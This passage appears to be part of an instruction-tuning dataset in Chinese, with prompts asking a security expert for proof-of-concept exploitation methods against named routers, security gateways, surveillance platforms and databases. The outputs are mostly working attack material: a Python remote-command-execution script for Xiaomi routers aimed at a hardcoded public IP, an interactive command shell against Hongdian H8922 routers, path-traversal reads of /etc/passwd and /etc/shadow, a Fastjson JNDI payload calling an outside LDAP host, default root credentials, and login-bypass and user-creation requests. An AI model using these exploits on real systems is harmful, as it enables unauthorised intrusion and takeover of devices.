\n<methodCall>\n<methodName>web.user_add</methodName>\n<params>\n<param>\n<value>\n<array>\n<data>\n<value>\n<string>admin</string>\n</value>\n<value>\n<string>5</string>\n</value>\n<value>\n<string>10.0.0.1</string>\n</value>\n</data>\n</array>\n</value>\n</param>\n<param>\n<value>\n<struct>\n<member>\n<name>uname</name>\n<value>\n<string>test</string>\n</value>\n</member>\n<member>\n<name>name</name>\n<value>\n<string>test</string>\n</value>\n</member>\n<member>\n<name>pwd</name>\n<value>\n<string>1qaz@3edC12345</string>\n</value>\n</member>\n<member>\n<name>authmode</name>\n<value>\n<string>1</string>\n</value>\n</member>\n<member>\n<name>deptid</name>\n<value>\n<string></string>\n</value>\n</member>\n<member>\n<name>email</name>\n<value>\n<string></string>\n</value>\n</member>\n<member>\n<name>mobile</name>\n<value>\n<string></string>\n</value>\n</member>\n<member>\n<name>comment</name>\n<value>\n<string></string>\n</value>\n</member>\n<member>\n<name>roleid</name>\n<value>\n<string>102</string>\n</value>\n</member>\n</struct></value>\n</param>\n</params>\n</methodCall>\n3. Cookie: LANG=zh; DBAPPUSM=ee4bbf6c85e541bb980ad4e0fbee2f57bb15bafe20a7028af9a0b8901cf80fd3\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/安恒 明御运维审计与风险控制系统 xmlrpc.sock 任意用户添加漏洞.md"}
    448. 

  448. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:小米 路由器 c_upload 远程命令执行漏洞 CVE-2019-18370\n漏洞描述:小米路由器存在接口,备份文件是tar.gz格式的,上传后tar zxf解压,所以构造备份文件,可以控制解压目录的文件内容,结合测试上传下载速度功能的sh脚本执行时读取测试url列表文件,并将url部分直接进行命令拼接执行。\n影响版本:``` 小米 路由器 ```\n网络测绘:``` app=\"小米路由器\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2019-18370\n【POC利用方法】\n1. app=\"小米路由器\"\n2. import os\nimport tarfile\nimport requests\n\n# proxies = {\"http\":\"http://127.0.0.1:8080\"}\nproxies = {}\n\n## get stok\nstok = input(\"stok: \")\n\n## make config file\ncommand = input(\"command: \")\nspeed_test_filename = \"speedtest_urls.xml\"\nwith open(\"template.xml\",\"rt\") as f:\n    template = f.read()\ndata = template.format(command=command)\n# print(data)\nwith open(\"speedtest_urls.xml\",'wt') as f:\n    f.write(data)\n\nwith tarfile.open(\"payload.tar.gz\", \"w:gz\") as tar:\n    # tar.add(\"cfg_backup.des\")\n    # tar.add(\"cfg_backup.mbu\")\n    tar.add(\"speedtest_urls.xml\")\n\n## upload config file\nprint(\"start uploading config file ...\")\nr1 = requests.post(\"http://101.249.46.7:8098/cgi-bin/luci/;stok={}/api/misystem/c_upload\".format(stok), files={\"image\":open(\"payload.tar.gz\",'rb')}, proxies=proxies)\n# print(r1.text)\n\n## exec download speed test, exec command\nprint(\"start exec command...\")\nr2 = requests.get(\"http://101.249.46.7:8098/cgi-bin/luci/;stok={}/api/xqnetdetect/netspeed\".format(stok), proxies=proxies)\n# print(r2.text)\n\n## read result file\nr3 = requests.get(\"http://101.249.46.7:8098/api-third-party/download/extdisks../tmp/1.txt\", proxies=proxies)\nif r3.status_code == 200:\n    print(\"success, vul\")\n    print(r3.text)\n3. <?xml version=\"1.0\"?>\n<root>\n    <class type=\"1\">\n        <item url=\"http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat\"/>\n        <item url=\"http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat\"/>\n        <item url=\"http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat\"/>\n        <item url=\"http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat\"/>\n        <item url=\"http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat\"/>\n        <item url=\"http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat\"/>\n        <item url=\"http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat\"/>\n        <item url=\"http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat\"/>\n        <item url=\"http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat\"/>\n        <item url=\"http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat\"/>\n        <item url=\"http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat\"/>\n        <item url=\"http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat\"/>\n        <item url=\"http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat\"/>\n        <item url=\"http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat\"/>\n    </class>\n    <class type=\"2\">\n        <item url=\"http://192.168.31.1 -q -O /dev/null;{command}>/tmp/1.txt;\"/>\n    </class>\n    <class type=\"3\">\n        <item uploadurl=\"http://www.taobao.com/\"/>\n        <item uploadurl=\"http://www.so.com/\"/>\n        <item uploadurl=\"http://www.qq.com/\"/>\n        <item uploadurl=\"http://www.sohu.com/\"/>\n        <item uploadurl=\"http://www.tudou.com/\"/>\n        <item uploadurl=\"http://www.360doc.com/\"/>\n        <item uploadurl=\"http://www.kankan.com/\"/>\n        <item uploadurl=\"http://www.speedtest.cn/\"/>\n    </class>\n</root>\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/小米 路由器 c_upload 远程命令执行漏洞 CVE-2019-18370.md"}
    449. 

  449. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:HIKVISION iVMS-8700综合安防管理平台 download 任意文件下载漏洞\n漏洞描述:HIKVISION iVMS-8700综合安防管理平台存在任意文件读取漏洞,攻击者通过发送特定的请求包可以读取服务器中的敏感文件获取服务器信息\n影响版本:HIKVISION iVMS-8700综合安防管理平台\n网络测绘:``` icon_hash=\"-911494769\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. icon_hash=\"-911494769\"\n2. /eps/api/triggerSnapshot/download?token=xxx&fileUrl=file:///C:/windows/win.ini&fileName=1\n3. 验证POC, token 为 Url md5\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/HIKVISION iVMS-8700综合安防管理平台 download 任意文件下载漏洞.md"}
    450. 

  450. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Arcadyan固件 cgi_i_filter.js 配置信息泄漏漏洞 CVE-2021-20092\n漏洞描述:Buffalo WSR-2533DHPL2 固件版本 <= 1.02 和 WSR-2533DHP3 固件版本 <= 1.24 的 Web 界面没有正确限制未经授权的参与者对敏感信息的访问。\n影响版本:| **Vendor**          | **Device**                         | **Found on version** | | ------------------- | ---------------------------------- | -------------------- | | ADB                 | ADSL wireless IAD router           | 1.26S-R-3P           | | Arcadyan            | ARV7519                            | 00.96.00.96.617ES    | | Arcadyan            | VRV9517                            | 6.00.17 build04      | | Arcadyan            | VGV7519                            | 3.01.116             | | Arcadyan            | VRV9518                            | 1.01.00 build44      | | ASMAX               | BBR-4MG / SMC7908 ADSL             | 0.08                 | | ASUS                | DSL-AC88U (Arc VRV9517)            | 1.10.05 build502     | | ASUS                | DSL-AC87VG (Arc VRV9510)           | 1.05.18 build305     | | ASUS                | DSL-AC3100                         | 1.10.05 build503     | | ASUS                | DSL-AC68VG                         | 5.00.08 build272     | | Beeline             | Smart Box Flash                    | 1.00.13_beta4        | | British Telecom     | WE410443-SA                        | 1.02.12 build02      | | Buffalo             | WSR-2533DHPL2                      | 1.02                 | | Buffalo             | WSR-2533DHP3                       | 1.24                 | | Buffalo             | BBR-4HG                            |                      | | Buffalo             | BBR-4MG                            | 2.08 Release 0002    | | Buffalo             | WSR-3200AX4S                       | 1.1                  | | Buffalo             | WSR-1166DHP2                       | 1.15                 | | Buffalo             | WXR-5700AX7S                       | 1.11                 | | Deutsche Telekom    | Speedport Smart 3                  | 010137.4.8.001.0     | | HughesNet           | HT2000W                            | 0.10.10              | | KPN                 | ExperiaBox V10A (Arcadyan VRV9517) | 5.00.48 build453     | | KPN                 | VGV7519                            | 3.01.116             | | O2                  | HomeBox 6441                       | 1.01.36              | | Orange              | LiveBox Fibra (PRV3399)            | 00.96.00.96.617ES    | | Skinny              | Smart Modem (Arcadyan VRV9517)     | 6.00.16 build01      | | SparkNZ             | Smart Modem (Arcadyan VRV9517)     | 6.00.17 build04      | | Telecom (Argentina) | Arcadyan VRV9518VAC23-A-OS-AM      | 1.01.00 build44      | | TelMex              | PRV33AC                            | 1.31.005.0012        | | TelMex              | VRV7006                            |                      | | Telstra             | Smart Modem Gen 2 (LH1000)         | 0.13.01r             | | Telus               | WiFi Hub (PRV65B444A-S-TS)         | v3.00.20             | | Telus               | NH20A                              | 1.00.10debug build06 | | Verizon             | Fios G3100                         | 2.0.0.6              | | Vodafone            | EasyBox 904                        | 4.16                 | | Vodafone            | EasyBox 903                        | 30.05.714            | | Vodafone            | EasyBox 802                        | 20.02.226            |\n网络测绘:``` app=\"Arcadyan-httpd-1.0\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2021-20092\n【POC利用方法】\n1. app=\"Arcadyan-httpd-1.0\"\n2. curl --include \"http://xxx.xxx.xxx.xxx/cgi/cgi_i_filter.js?_tn=348876758\" -H \"Referer: http://xxx.xxx.xxx.xxx/loginerror.html\"\n3. curl --include \"http://xxx.xxx.xxx.xxx/cgi/cgi_i_filter.js?_tn=348876758\" -H \"Referer: http://xxx.xxx.xxx.xxx/loginerror.html\"\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/Arcadyan固件 cgi_i_filter.js 配置信息泄漏漏洞 CVE-2021-20092.md"}
    451. 

  451. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:D-Link DSL-28881A 未授权访问 CVE-2020-24579\n漏洞描述:路由器Web门户的身份验证不足,无法访问任何经过身份验证的管理页面,而无需输入正确的密码。位于同一网络上的恶意用户可以使用无效的凭据直接浏览到任何经过身份验证的管理页面。\n影响版本:``` D-Link DSL-2888A ```\n网络测绘:``` body=\"DSL-2888A\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2020-24579\n【POC利用方法】\n1. D-Link DSL-2888A\n2. body=\"DSL-2888A\"\n3. 跳转到 http://xxx.xxx.xxx.xxx/page/login/login.html?error=fail 显示密码错误\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/D-Link DSL-28881A 未授权访问 CVE-2020-24579.md"}
    452. 

  452. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:中科网威 下一代防火墙控制系统 download.php 任意文件读取漏洞\n漏洞描述:中科网威 下一代防火墙控制系统 download.php 任意文件读取漏洞, 攻击者通过漏洞可以读取服务器上的文件\n影响版本:``` 中科网威 下一代防火墙控制系统 ```\n网络测绘:``` body=\"Get_Verify_Info(hex_md5(user_string).\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. 中科网威 下一代防火墙控制系统\n2. body=\"Get_Verify_Info(hex_md5(user_string).\"\n3. /download.php?&class=vpn&toolname=../../../../../../../../etc/passwd\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/中科网威 下一代防火墙控制系统 download.php 任意文件读取漏洞.md"}
    453. 

  453. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:宏电 H8922 后台命令执行漏洞 CVE-2021-28150\n漏洞描述:宏电 H8922 后台中的网络测试模块中存在命令执行漏洞。通过命令拼接执行任意命令\n影响版本:``` 宏电 H8922 ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2021-28150\n【POC利用方法】\n1. app:\"Hongdian H8922 Industrial Router\"\n2. POST /tools.cgi HTTP/1.1\nHost: xxx.xxx.xxx.xxx\nContent-Length: 96\nCache-Control: max-age=0\nAuthorization: Basic Z3Vlc3Q6Z3Vlc3Q=\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36\nContent-Type: application/x-www-form-urlencoded\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6\nx-forwarded-for: 127.0.0.1\nx-originating-ip: 127.0.0.1\nx-remote-ip: 127.0.0.1\nx-remote-addr: 127.0.0.1\nConnection: close\n\nop_type=ping&destination=;cat /etc/passwd&user_options=uid%3D0%28root%29+gid%3D0%28root%29%0D%0A\n3. import requests\nimport sys\nimport random\nimport re\nfrom lxml import etree\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\ndef title():\n    print('+------------------------------------------')\n    print('+  \\033[34mPOC_Des: http://wiki.peiqi.tech                                   \\033[0m')\n    print('+  \\033[34mGithub : https://github.com/PeiQi0                                 \\033[0m')\n    print('+  \\033[34m公众号  : PeiQi文库                                                   \\033[0m')\n    print('+  \\033[34mTitle  : 宏电 H8922 后台命令执行漏洞 CVE-2021-28150                  \\033[0m')\n    print('+  \\033[36m使用格式:  python3 poc.py                                            \\033[0m')\n    print('+  \\033[36mUrl         >>> http://xxx.xxx.xxx.xxx                             \\033[0m')\n    print('+------------------------------------------')\n\ndef POC_1(target_url, cmd):\n    vuln_url = target_url + \"/tools.cgi\"\n    headers = {\n            \"Content-Type\": \"application/x-www-form-urlencoded\",\n            \"Authorization\": \"Basic Z3Vlc3Q6Z3Vlc3Q=\"\n    }\n    data = \"op_type=ping&destination=;cat /etc/passwd&user_options=uid%3D0%28root%29+gid%3D0%28root%29%0D%0A\"\n    try:\n        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n        response = requests.post(url=vuln_url, headers=headers, data=data, verify=False, timeout=5)\n        print(\"\\033[32m[o] 正在请求 {}/tools.cgi \\033[0m\".format(target_url))\n        if \"root\" in response.text and response.status_code == 200:\n            print(\"\\033[32m[o] 目标 {}存在漏洞 ,存在访客账号 guest/guest 成功执行 cat /etc/passwd \\033[0m\".format(target_url))\n            html = etree.HTML(response.text)\n            cmd_test = html.xpath('/html/body/div[1]/div/div[2]/div/form/fieldset[2]/div/textarea/text()')[0]\n            print(\"\\033[32m[o] 响应为:\\n{} \\033[0m\".format(cmd_test))\n            while True:\n                cmd = input(\"\\033[35mCmd >>> \\033[0m\")\n                if cmd == \"exit\":\n                    sys.exit(0)\n                else:\n                    POC_2(target_url, cmd)\n        else:\n            print(\"\\033[31m[x] 请求失败 \\033[0m\")\n            sys.exit(0)\n    except Exception as e:\n        print(\"\\033[31m[x] 请求失败 \\033[0m\", e)\n\ndef POC_2(target_url, cmd):\n    vuln_url = target_url + \"/tools.cgi\"\n    headers = {\n        \"Content-Type\": \"application/x-www-form-urlencoded\",\n        \"Authorization\": \"Basic Z3Vlc3Q6Z3Vlc3Q=\"\n    }\n    data = \"op_type=ping&destination=;{}&user_options=uid%3D0%28root%29+gid%3D0%28root%29%0D%0A\".format(cmd)\n    try:\n        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n        response = requests.post(url=vuln_url, headers=headers, data=data, verify=False, timeout=5)\n        html = etree.HTML(response.text)\n        cmd_test = html.xpath('/html/body/div[1]/div/div[2]/div/form/fieldset[2]/div/textarea/text()')[0]\n        print(\"\\033[32m[o] 响应为:\\n{} \\033[0m\".format(cmd_test))\n\n    except Exception as e:\n        print(\"\\033[31m[x] 请求失败 \\033[0m\", e)\n\n\nif __name__ == '__main__':\n    title()\n    cmd = 'cat /etc/passwd'\n    target_url = str(input(\"\\033[35mPlease input Attack Url\\nUrl >>> \\033[0m\"))\n    POC_1(target_url, cmd)\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/宏电 H8922 后台命令执行漏洞 CVE-2021-28150.md"}
    454. 

  454. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:iKuai 后台任意文件读取漏洞\n漏洞描述:参考链接: - https://forum.ywhack.com/thread-115307-1-8.html\n影响版本:影响版本,不一定是绝对版本,也可能其它版本都存在: ``` 3.2.8 x64 Build201910101758 ```\n网络测绘:``` title=\"登录爱快流控路由\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. 3.2.8 x64 Build201910101758\n2. title=\"登录爱快流控路由\"\n3. GET /Action/download?filename=../../../../../../etc/shadow HTTP/1.1\nHost:\n....\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/iKuai 后台任意文件读取漏洞.md"}
    455. 

  455. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Kyan 网络监控设备 run.php 远程命令执行漏洞\n漏洞描述:Kyan 网络监控设备 run.php可在身份验证的情况下执行任意命令, 配合账号密码泄露漏洞,可以获取服务器权限,存在远程命令执行漏洞\n影响版本:``` Kyan ```\n网络测绘:``` title=\"platform - Login\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. title=\"platform - Login\"\n2. <?php \nrequire_once 'functions.php';\nrequire_once 'international.php';\nsession_start();\nauth_check();\nprint_html_begin('run');\n?>\n<body link=\"#000000\" vlink=\"#000000\" alink=\"#000000\" bgcolor=\"#FFFFFF\">\n\n<form method=\"post\">\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse: collapse\" width=\"100%\" id=\"AutoNumber1\" height=\"25\" bordercolor=\"#000000\">\n    <tr>\n      <td width=\"100%\" height=\"25\" bgcolor=\"#FCFEBA\">\n      <p align=\"center\"><font face=\"Verdana\" size=\"2\"> Shell Execute </font></td>\n    </tr>\n    <tr>\n      <td width=\"100%\" height=\"25\" bgcolor=\"#FCFEBA\">\n            <div align=\"center\">\n              <textarea name=\"command\" rows=\"2\" cols=\"100\" ><?php echo $_POST['command']; ?>\n              </textarea> \n        </div></td>\n    </tr>\n    <tr>\n      <td width=\"100%\" height=\"25\" bgcolor=\"#FCFEBA\">\n        <div align=\"center\">\n          <input type=\"submit\" value=\"Execute\">\n          </div></td>\n    </tr>\n    <tr>\n      <td width=\"100%\" height=\"25\" bgcolor=\"#FCFEBA\">\n        <div align=\"center\">\n          <textarea name=\"textarea\" cols=\"100\" rows=\"50\" readonly><?php @$output = system(trim($_POST['command'])); ?>\n          </textarea>\n        </div></td>\n    </tr>\n</table>\n</form>\n</body> \n<?php\nprint_html_end(); \n?>\n3. <form method=\"post\">\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/Kyan 网络监控设备 run.php 远程命令执行漏洞.md"}
    456. 

  456. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:KEDACOM 数字系统接入网关 任意文件读取漏洞\n漏洞描述:KEDACOM 数字系统接入网关 存在任意文件读取漏洞,攻击者通过构造请求可以读取服务器任意文件\n影响版本:``` KEDACOM 数字系统接入网关 ```\n网络测绘:``` (app=\"KEDACOM-DVR接入网关\") && (is_honeypot=false && is_fraud=false) ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. KEDACOM 数字系统接入网关\n2. (app=\"KEDACOM-DVR接入网关\") && (is_honeypot=false && is_fraud=false)\n3. /gatewayweb/FileDownloadServlet?fileName=test.txt&filePath=../../../../../../../../../../Windows/System32/drivers/etc/hosts%00.jpg&type=2\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/KEDACOM 数字系统接入网关 任意文件读取漏洞.md"}
    457. 

  457. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:H3C SecParh堡垒机 get_detail_view.php 任意用户登录漏洞\n漏洞描述:H3C SecParh堡垒机 get_detail_view.php 存在任意用户登录漏洞 与齐治堡垒机出现的漏洞相似\n影响版本:``` H3C SecParh堡垒机 ```\n网络测绘:``` app=\"H3C-SecPath-运维审计系统\" && body=\"2018\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. H3C SecParh堡垒机\n2. app=\"H3C-SecPath-运维审计系统\" && body=\"2018\"\n3. /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/H3C SecParh堡垒机 get_detail_view.php 任意用户登录漏洞.md"}
    458. 

  458. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:安恒 明御安全网关 aaa_portal_auth_local_submit 远程命令执行漏洞\n漏洞描述:安恒 明御安全网关 aaa_portal_auth_local_submit 存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限\n影响版本:安恒 明御安全网关\n网络测绘:``` body=\"/webui/images/basic/login/\" && title==\"明御安全网关\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. body=\"/webui/images/basic/login/\" && title==\"明御安全网关\"\n2. GET /webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&suffix={{urlenc(`id >/usr/local/webui/test.txt`)}} HTTP/1.1\nHost: \nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36\nConnection: close\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip\n3. GET /webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&suffix={{urlenc(`id >/usr/local/webui/test.txt`)}} HTTP/1.1\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/安恒 明御安全网关 aaa_portal_auth_local_submit 远程命令执行漏洞.md"}
    459. 

  459. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:启明星辰 4A统一安全管控平台 getMaster.do 信息泄漏漏洞\n漏洞描述:启明星辰 4A统一安全管控平台 getMaster.do 接口存在信息泄漏漏洞,通过发送特定请求包可以获取用户敏感信息\n影响版本:启明星辰 4A统一安全管控平台\n网络测绘:web.body=\"cas/css/ace-part2.min.css\"\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. /accountApi/getMaster.do\n2. 启明星辰 4A统一安全管控平台 getMaster.do 接口存在信息泄漏漏洞,通过发送特定请求包可以获取用户敏感信息\n3. /accountApi/getMaster.do\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/启明星辰 4A统一安全管控平台 getMaster.do 信息泄漏漏洞.md"}
    460. 

  460. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Kyan 网络监控设备 hosts 账号密码泄露漏洞\n漏洞描述:Kyan 网络监控设备 存在账号密码泄露漏洞,攻击者通过漏洞可以获得账号密码和后台权限\n影响版本:``` Kyan ```\n网络测绘:``` title=\"platform - Login\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. title=\"platform - Login\"\n2. http://xxx.xxx.xxx.xxx/hosts\n3. http://xxx.xxx.xxx.xxx/hosts\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/Kyan 网络监控设备 hosts 账号密码泄露漏洞.md"}
    461. 

  461. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:信诺瑞得 WiseGrid慧敏应用交付网关 sysadmin_action.php 后台命令执行漏洞\n漏洞描述:信诺瑞得 WiseGrid慧敏应用交付网关 sysadmin_action.php 对应的ping功能存在后台命令执行漏洞,通过默认口令可以获取系统权限\n影响版本:``` 信诺瑞得 WiseGrid慧敏应用交付网关 ```\n网络测绘:``` app=\"WiseGrid慧敏应用交付网关\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. 信诺瑞得 WiseGrid慧敏应用交付网关\n2. app=\"WiseGrid慧敏应用交付网关\"\n3. ssh:root/sinogrid\nweb: admin/sinogrid\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/信诺瑞得 WiseGrid慧敏应用交付网关 sysadmin_action.php 后台命令执行漏洞.md"}
    462. 

  462. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:HIKVISION 综合安防管理平台 applyCT Fastjson远程命令执行漏洞\n漏洞描述:HIKVISION 综合安防管理平台 applyCT 存在低版本Fastjson远程命令执行漏洞,攻击者通过漏洞可以执行任意命令获取服务器权限\n影响版本:``` HIKVISION 综合安防管理平台 ```\n网络测绘:``` app=\"HIKVISION-综合安防管理平台\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. HIKVISION 综合安防管理平台\n2. app=\"HIKVISION-综合安防管理平台\"\n3. POST /bic/ssoService/v1/applyCT \nContent-Type: application/json\n\n{\"a\":{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://xxx.xxx.xxx.xxx/Basic/TomcatEcho\",\"autoCommit\":true},\"hfe4zyyzldp\":\"=\"}\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/HIKVISION 综合安防管理平台 applyCT Fastjson远程命令执行漏洞.md"}
    463. 

  463. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:MySQL UDF 提权漏洞\n漏洞描述:UDF 是 MySQL 的一个共享库,通过 udf 创建能够执行系统命令的函数 sys_exec、sys_eval,使得入侵者能够获得一般情况下无法获得的 shell 执行权限。 参考链接: - https://github.com/mysqludf/lib_mysqludf_sys - https://www.sqlsec.com/2020/11/mysql.html#%E5%86%99%E5%85%A5%E5%8A%A8%E6%80%81%E9%93%BE%E6%8E%A5%E5%BA%93\n影响版本:``` 在 MySQL 5.5 之前 secure_file_priv 默认是空,这个情况下可以向任意绝对路径写文件 在 MySQL 5.5 之后 secure_file_priv 默认是 NULL,这个情况下不可以写文件 ```\n", "input": "", "output": "【漏洞类型】database_vulnerability\n【POC利用方法】\n1. 在 MySQL 5.5 之前 secure_file_priv 默认是空,这个情况下可以向任意绝对路径写文件\n在 MySQL 5.5 之后 secure_file_priv 默认是 NULL,这个情况下不可以写文件\n2. mysql> show global variables like '%secure_file_priv%';\n3. mysql> show variables like '%plugin%';\n+---------------+-------------------------+\n| Variable_name | Value                   |\n+---------------+-------------------------+\n| plugin_dir    | /usr/lib64/mysql/plugin |\n+---------------+-------------------------+\n1 row in set (0.00 sec)\n", "category": "poc_database_vulnerability", "source": "awesome_poc_dataset", "file_path": "数据库漏洞/MySQL UDF 提权漏洞.md"}
    464. 

  464. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:InfluxDB 未授权访问漏洞\n漏洞描述:influxdb是一款著名的时序数据库,其使用jwt作为鉴权方式。在用户开启了认证,但未设置参数`shared-secret`的情况下,jwt的认证密钥为空字符串,此时攻击者可以伪造任意用户身份在influxdb中执行SQL语句。 JWT,全称是JSON Web Token,是一种易于使用、无状态的鉴权方式。简单来说,就是Server端把JSON数据经过加密做成token,以授权给Client端。 参考链接: - https://www.komodosec.com/post/when-all-else-fails-find-a-0-day - https://docs.influxdata.com/influxdb/v1.7/administration/config/#http-endpoints-settings\n", "input": "", "output": "【漏洞类型】database_vulnerability\n【POC利用方法】\n1. docker-compose up -d\n2. {\n  \"alg\": \"HS256\",\n  \"typ\": \"JWT\"\n}\n{\n  \"username\": \"admin\",\n  \"exp\": 1745680213\n}\n3. - https://www.komodosec.com/post/when-all-else-fails-find-a-0-day\n", "category": "poc_database_vulnerability", "source": "awesome_poc_dataset", "file_path": "数据库漏洞/InfluxDB 未授权访问漏洞.md"}
    465. 

